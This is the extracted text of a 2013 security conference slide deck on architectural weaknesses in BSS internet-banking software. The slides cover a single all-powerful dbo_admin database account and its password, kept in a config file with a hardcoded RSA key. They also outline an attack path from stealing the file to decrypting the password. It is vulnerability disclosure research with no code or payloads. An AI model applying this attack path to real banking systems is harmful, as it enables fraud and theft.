Gleb Cherbov - DBO Hacking — arch bugs in BSS

21
Arch bugs in BSS Gleb Cherbov Security Researcher Digital Security (ERPScan)

description

 

Transcript of Gleb Cherbov - DBO Hacking — arch bugs in BSS

Page 1: Gleb Cherbov - DBO Hacking — arch bugs in BSS

Arch bugs in BSS

Gleb CherbovSecurity ResearcherDigital Security (ERPScan)

Page 2: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

Banking

2

Arch bugs in BSS

Page 3: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

3

Arch bugs in BSS

Internet banking. Client side

Page 4: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

How it worx

4

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 5: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

How it worx

5

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 6: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

How it worx

6

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 7: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

How it worx

7

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 8: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

Select a target

8

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

SQL injection

Insider attack

Page 9: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

Select a target

9

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 10: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

Select a target

10

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Page 11: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

11

Arch bugs in BSS

Operator’s environmentOperator DBMS

oper_loginoper_pass

dbo_admin

Authentication

Page 12: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

12

Arch bugs in BSS

• dbo_admin is the only account at DBMS• dbo_admin has full access• every operator can connect to DBMS directly• oper auth on app side

Dbo_admin

Page 13: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

13

Arch bugs in BSS

dbo_admin password is encrypted

Lookin’ for a passwd

and stored in a .cfg file near the app

Page 14: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

14

Arch bugs in BSS

Quote

“it’s impossible to decrypt it” (c) BSS support

Page 15: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

15

Arch bugs in BSS

Let’s take a look

RSA modulus

RSA private exp

Unusual base64 alphabet

Page 16: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

16

Arch bugs in BSS

Let’s take a look

Well… looks like base64?

Page 17: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

17

Arch bugs in BSS

Also…

Innovative password storage widely used in BSS products

With the same hardcoded RSA key

Page 18: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

Malware

18

Arch bugs in BSS

ABS

WEB Server + App ServerDBMS

OperatorOperator’s environment

Get conf file

Decrypt dbo_admin pass

Wreak havoc

Page 19: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

19

Arch bugs in BSS

Attack vector?

•Insider

•Targeted attack

•Malware

Page 20: Gleb Cherbov - DBO Hacking — arch bugs in BSS

© 2002—2013, Digital Security

20

Arch bugs in BSS

Tricky data manipulations

Page 21: Gleb Cherbov - DBO Hacking — arch bugs in BSS

Digital Security in Moscow: +7 (495) 223-07-86

Digital Security in Saint Petersburg: +7 (812) 703-15-47

Questions?

www.dsec.ruwww.erpscan.com

[email protected]